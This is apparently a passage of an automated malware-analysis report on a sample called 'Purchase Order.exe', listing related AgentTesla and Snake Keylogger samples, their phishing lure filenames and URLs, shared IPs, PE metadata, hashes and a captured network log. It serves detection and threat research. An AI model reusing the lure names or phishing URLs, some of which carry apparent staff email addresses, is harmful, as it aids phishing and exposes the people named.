	Dhl 0393837.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	208.91.199.225
	SecuriteInfo.com.Win32.TrojanX-gen.27067.30548.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	6P8VytD7wo.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	CV Mariana Alvarez.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	RFQ DM03058 pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.91.198.143
	DHL Waybill & Shipping Documents.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	Quotation - HDPE Fittings.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	Quotation - HDPE Fittings.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.91.199.225
checkip.dyndns.com	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	193.122.6.168
	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	132.226.8.169
	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	193.122.130.0
	z52OURO08765.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	132.226.8.169
	Quark Browser.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	193.122.130.0
	Hitomi Downloader.exe	Get hash	malicious	Agent Tesla, AgentTesla, RisePro Stealer	Browse	158.101.44.242
	PT98765445670009.scr.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	8wvP84hzFu.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	SDTP098766700000.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
reallyfreegeoip.org	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.67.152
	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134
	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.67.152
	z52OURO08765.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.177.134
	PT98765445670009.scr.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	8wvP84hzFu.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	SDTP098766700000.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	sipari#U015f formu_831512.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	23343100IM00270839_Dekont1.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
scratchdreams.tk	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.169.18
	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.27.85
	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.169.18
	z52OURO08765.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	172.67.169.18
	PT98765445670009.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	8wvP84hzFu.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85
	SDTP098766700000.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.169.18
	Payment_Draft_confirmation.xla.xlsx	Get hash	malicious	Snake Keylogger	Browse	172.67.169.18
	e-dekont.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.27.85

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://m.exactag.com/ai.aspx?tc=d9985160bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41hilanddalry.net%2Ftoro%2F67328%2F%2FYWxla3NhbmRlckBtaWRsYW5kY29tcHV0ZXJzLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://www.pxfuel.com/	Get hash	malicious	Unknown	Browse	104.26.8.178
	PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat	Get hash	malicious	Remcos, DBatLoader	Browse	162.159.129.233
	https://usedlpgtank.com/.usaru/asif.hussain@mpft.nhs.uk	Get hash	malicious	Unknown	Browse	172.64.207.38
	PURCHASE ORDER MSM09897.PDF.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://adclick.g.doubleclick.net/pcs/click?fjWKRXTAP84695-novemberkd&&adurl=http://www.baidu.com/link?url=kRuPteP7ef3mkmqYKWXPX2MIE97SbdelD6gnMOM3pq_#https://ssB.fqqydm.ru/ssB2/#Xjohn.loughran@mpft.nhs.uk	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	Halkbank,pdf.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	loader.exe	Get hash	malicious	Binder HackTool, XWorm	Browse	104.26.0.5
	Dhl 984857.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	DHL - OVERDUE ACCOUNT NOTICE -1301858139#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
PUBLIC-DOMAIN-REGISTRYUS	https://m.exactag.com/ai.aspx?tc=d9985160bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41hilanddalry.net%2Ftoro%2F67328%2F%2FYWxla3NhbmRlckBtaWRsYW5kY29tcHV0ZXJzLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	162.222.227.139
	PURCHASE ORDER MSM09897.PDF.exe	Get hash	malicious	AgentTesla	Browse	207.174.215.2
	Dhl 984857.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	Dhl 0393837.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	208.91.199.225
	SecuriteInfo.com.Win32.TrojanX-gen.27067.30548.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	WNGO8CYRZG.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	6P8VytD7wo.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	CV Mariana Alvarez.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.225
	F0A7vyQAuZ.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
CLOUDFLARENETUS	https://m.exactag.com/ai.aspx?tc=d9985160bc40b07205bbd26a23a8d2e6b6b4f9&url=%68%74%74%70%25%33%41hilanddalry.net%2Ftoro%2F67328%2F%2FYWxla3NhbmRlckBtaWRsYW5kY29tcHV0ZXJzLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://www.pxfuel.com/	Get hash	malicious	Unknown	Browse	104.26.8.178
	PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat	Get hash	malicious	Remcos, DBatLoader	Browse	162.159.129.233
	https://usedlpgtank.com/.usaru/asif.hussain@mpft.nhs.uk	Get hash	malicious	Unknown	Browse	172.64.207.38
	PURCHASE ORDER MSM09897.PDF.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://adclick.g.doubleclick.net/pcs/click?fjWKRXTAP84695-novemberkd&&adurl=http://www.baidu.com/link?url=kRuPteP7ef3mkmqYKWXPX2MIE97SbdelD6gnMOM3pq_#https://ssB.fqqydm.ru/ssB2/#Xjohn.loughran@mpft.nhs.uk	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	Halkbank,pdf.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	loader.exe	Get hash	malicious	Binder HackTool, XWorm	Browse	104.26.0.5
	Dhl 984857.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	DHL - OVERDUE ACCOUNT NOTICE -1301858139#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
UTMEMUS	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	132.226.8.169
	z52OURO08765.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	132.226.8.169
	8wvP84hzFu.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	23343100IM00270839_Dekont1.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	9NdabeH642.elf	Get hash	malicious	Mirai, Moobot	Browse	132.240.147.214
	Payment_Draft_confirmation.xla.xlsx	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	xdd6BRIg0O.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	132.226.247.73
	AMM9Xsyg59.elf	Get hash	malicious	Mirai	Browse	128.169.185.82
	Mquqdysqqv.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	132.226.247.73
	SecuriteInfo.com.Trojan.PackedNET.2725.1552.3502.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	109__Purchase_Order.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	1d4D5ndo0x.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.67.152
	FGT5000800000.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.67.152
	D09876500900000H.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.67.152
	z52OURO08765.exe	Get hash	malicious	PureLog Stealer, RedLine, Snake Keylogger	Browse	104.21.67.152
	Quark Browser.exe	Get hash	malicious	Agent Tesla, AgentTesla	Browse	104.21.67.152
	Hitomi Downloader.exe	Get hash	malicious	Agent Tesla, AgentTesla, RisePro Stealer	Browse	104.21.67.152
	cBhUkqlChn.exe	Get hash	malicious	Orcus	Browse	104.21.67.152
	uk1HIyOQbk.exe	Get hash	malicious	Unknown	Browse	104.21.67.152
	uk1HIyOQbk.exe	Get hash	malicious	Unknown	Browse	104.21.67.152
3b5074b1b5d032e5620f69f9f700ff0e	PURCHASE ORDER MSM09897.PDF.exe	Get hash	malicious	AgentTesla	Browse	172.67.169.18
	Halkbank,pdf.exe	Get hash	malicious	AgentTesla	Browse	172.67.169.18
	Dhl 984857.exe	Get hash	malicious	AgentTesla	Browse	172.67.169.18
	DHL - OVERDUE ACCOUNT NOTICE -1301858139#U00faPDF.scr.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.169.18
	Dhl 0393837.exe	Get hash	malicious	AgentTesla	Browse	172.67.169.18
	Purchasing_49427020424_8568658.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.169.18
	03-04024 AQQ -T7630-CVE84 7281 Rieckermann.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.169.18
	4938730).vbs	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	172.67.169.18
	SCO 2024.PDF.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.169.18
	Order inquiry.vbs	Get hash	malicious	Remcos	Browse	172.67.169.18

Process:	C:\Users\user\Desktop\Purchase Order.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.895429034115649
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Purchase Order.exe
File size:	545'792 bytes
MD5:	654c1586b15a278983493f57f72cacb7
SHA1:	5b6df8769764505ffdb7691ac2150d4327eb8104
SHA256:	191239a61c70ba900694d294a164f4a162b84d11672871fbb5389967bbf52c7e
SHA512:	0261b627ed3e545a73868d559497fe44060fe9f62e98f6abd1b315c76461fd923e15eff017071d4c3670acd46e79aa4d6c5b0779a3005a1dc414007bd3b2264f
SSDEEP:	12288:oBUHz1PozcOXiblkQN6gK+papl9P3oZihQbQXMKPDq:oGHzqBaiG6oaP9P3SihQb0b
TLSH:	D1C4024036BE8F93E5F94BF68470A01487F4792F28B6E30E5DC210E949B1F505A92F97
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..J.........."i... ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x486922
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xD78ABBA7 [Fri Aug 4 02:10:47 2084 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
xor al, 38h
xor eax, 38483446h
xor al, 47h
dec eax
xor eax, 00003447h
add byte ptr [edx], dh
inc ebx
inc edx
push ebx
aaa
dec eax
xor eax, 00003439h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x868ce	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x88000	0x5ac	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x8a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x84614	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x84948	0x84a00	a367f1b8423a614c1c033bcb52199d89	False	0.9277362158341188	data	7.904697572590049	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x88000	0x5ac	0x600	fb7714d8e6f5fc52597c169ca504abe4	False	0.4212239583333333	data	4.0762929028766	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x8a000	0xc	0x200	1dbc5c6df18a8ab418170c75eb37567d	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x88090	0x31c	data			0.4321608040201005
RT_MANIFEST	0x883bc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 4, 2024 10:27:55.207700968 CEST	49709	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:27:55.442375898 CEST	80	49709	132.226.247.73	192.168.2.5
Apr 4, 2024 10:27:55.442462921 CEST	49709	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:27:55.442771912 CEST	49709	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:27:55.678927898 CEST	80	49709	132.226.247.73	192.168.2.5
Apr 4, 2024 10:27:55.679744959 CEST	80	49709	132.226.247.73	192.168.2.5
Apr 4, 2024 10:27:55.684537888 CEST	49709	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:27:55.920300961 CEST	80	49709	132.226.247.73	192.168.2.5
Apr 4, 2024 10:27:55.968890905 CEST	49709	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:27:56.085236073 CEST	49710	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:56.085268021 CEST	443	49710	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:56.085433006 CEST	49710	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:56.091358900 CEST	49710	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:56.091373920 CEST	443	49710	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:56.353866100 CEST	443	49710	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:56.354161024 CEST	49710	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:56.359365940 CEST	49710	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:56.359379053 CEST	443	49710	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:56.359672070 CEST	443	49710	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:56.403366089 CEST	49710	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:56.444250107 CEST	443	49710	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:56.644984961 CEST	443	49710	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:56.645114899 CEST	443	49710	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:56.649862051 CEST	49710	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:56.655358076 CEST	49710	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:56.657218933 CEST	49709	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:27:56.892607927 CEST	80	49709	132.226.247.73	192.168.2.5
Apr 4, 2024 10:27:56.895149946 CEST	49711	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:56.895186901 CEST	443	49711	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:56.895250082 CEST	49711	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:56.895550013 CEST	49711	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:56.895562887 CEST	443	49711	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:56.937549114 CEST	49709	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:27:57.155155897 CEST	443	49711	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:57.165738106 CEST	49711	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:57.165776968 CEST	443	49711	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:57.458391905 CEST	443	49711	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:57.458487988 CEST	443	49711	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:57.458559990 CEST	49711	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:57.459167957 CEST	49711	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:57.463090897 CEST	49709	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:27:57.464296103 CEST	49712	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:27:57.696438074 CEST	80	49712	132.226.247.73	192.168.2.5
Apr 4, 2024 10:27:57.696651936 CEST	49712	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:27:57.696743965 CEST	49712	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:27:57.697844028 CEST	80	49709	132.226.247.73	192.168.2.5
Apr 4, 2024 10:27:57.697906017 CEST	49709	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:27:57.928708076 CEST	80	49712	132.226.247.73	192.168.2.5
Apr 4, 2024 10:27:57.929542065 CEST	80	49712	132.226.247.73	192.168.2.5
Apr 4, 2024 10:27:57.931044102 CEST	49713	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:57.931075096 CEST	443	49713	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:57.931171894 CEST	49713	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:57.931422949 CEST	49713	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:57.931435108 CEST	443	49713	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:57.984443903 CEST	49712	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:27:58.188324928 CEST	443	49713	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:58.190254927 CEST	49713	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:58.190273046 CEST	443	49713	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:58.485289097 CEST	443	49713	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:58.485409021 CEST	443	49713	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:58.485464096 CEST	49713	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:58.486016035 CEST	49713	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:58.491061926 CEST	49714	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:27:58.721322060 CEST	80	49714	132.226.247.73	192.168.2.5
Apr 4, 2024 10:27:58.721643925 CEST	49714	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:27:58.721911907 CEST	49714	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:27:58.952255011 CEST	80	49714	132.226.247.73	192.168.2.5
Apr 4, 2024 10:27:58.952750921 CEST	80	49714	132.226.247.73	192.168.2.5
Apr 4, 2024 10:27:58.954505920 CEST	49715	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:58.954535007 CEST	443	49715	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:58.954720020 CEST	49715	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:58.954927921 CEST	49715	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:58.954941988 CEST	443	49715	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:59.000098944 CEST	49714	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:27:59.211585999 CEST	443	49715	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:59.213311911 CEST	49715	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:59.213336945 CEST	443	49715	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:59.508538961 CEST	443	49715	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:59.508641958 CEST	443	49715	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:59.508830070 CEST	49715	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:59.509484053 CEST	49715	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:59.512984991 CEST	49714	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:27:59.514183998 CEST	49716	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:27:59.742074966 CEST	80	49716	132.226.247.73	192.168.2.5
Apr 4, 2024 10:27:59.742151022 CEST	49716	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:27:59.742269039 CEST	49716	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:27:59.744247913 CEST	80	49714	132.226.247.73	192.168.2.5
Apr 4, 2024 10:27:59.744316101 CEST	49714	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:27:59.971712112 CEST	80	49716	132.226.247.73	192.168.2.5
Apr 4, 2024 10:27:59.972361088 CEST	80	49716	132.226.247.73	192.168.2.5
Apr 4, 2024 10:27:59.973692894 CEST	49717	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:59.973743916 CEST	443	49717	104.21.67.152	192.168.2.5
Apr 4, 2024 10:27:59.973812103 CEST	49717	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:59.974039078 CEST	49717	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:27:59.974056005 CEST	443	49717	104.21.67.152	192.168.2.5
Apr 4, 2024 10:28:00.015661955 CEST	49716	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:28:00.231553078 CEST	443	49717	104.21.67.152	192.168.2.5
Apr 4, 2024 10:28:00.232954979 CEST	49717	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:28:00.232988119 CEST	443	49717	104.21.67.152	192.168.2.5
Apr 4, 2024 10:28:00.529886007 CEST	443	49717	104.21.67.152	192.168.2.5
Apr 4, 2024 10:28:00.530013084 CEST	443	49717	104.21.67.152	192.168.2.5
Apr 4, 2024 10:28:00.530162096 CEST	49717	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:28:00.530453920 CEST	49717	443	192.168.2.5	104.21.67.152
Apr 4, 2024 10:28:00.533391953 CEST	49716	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:28:00.534461021 CEST	49718	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:28:00.761117935 CEST	80	49716	132.226.247.73	192.168.2.5
Apr 4, 2024 10:28:00.761197090 CEST	49716	80	192.168.2.5	132.226.247.73
Apr 4, 2024 10:28:00.764693975 CEST	80	49718	132.226.247.73	192.168.2.5
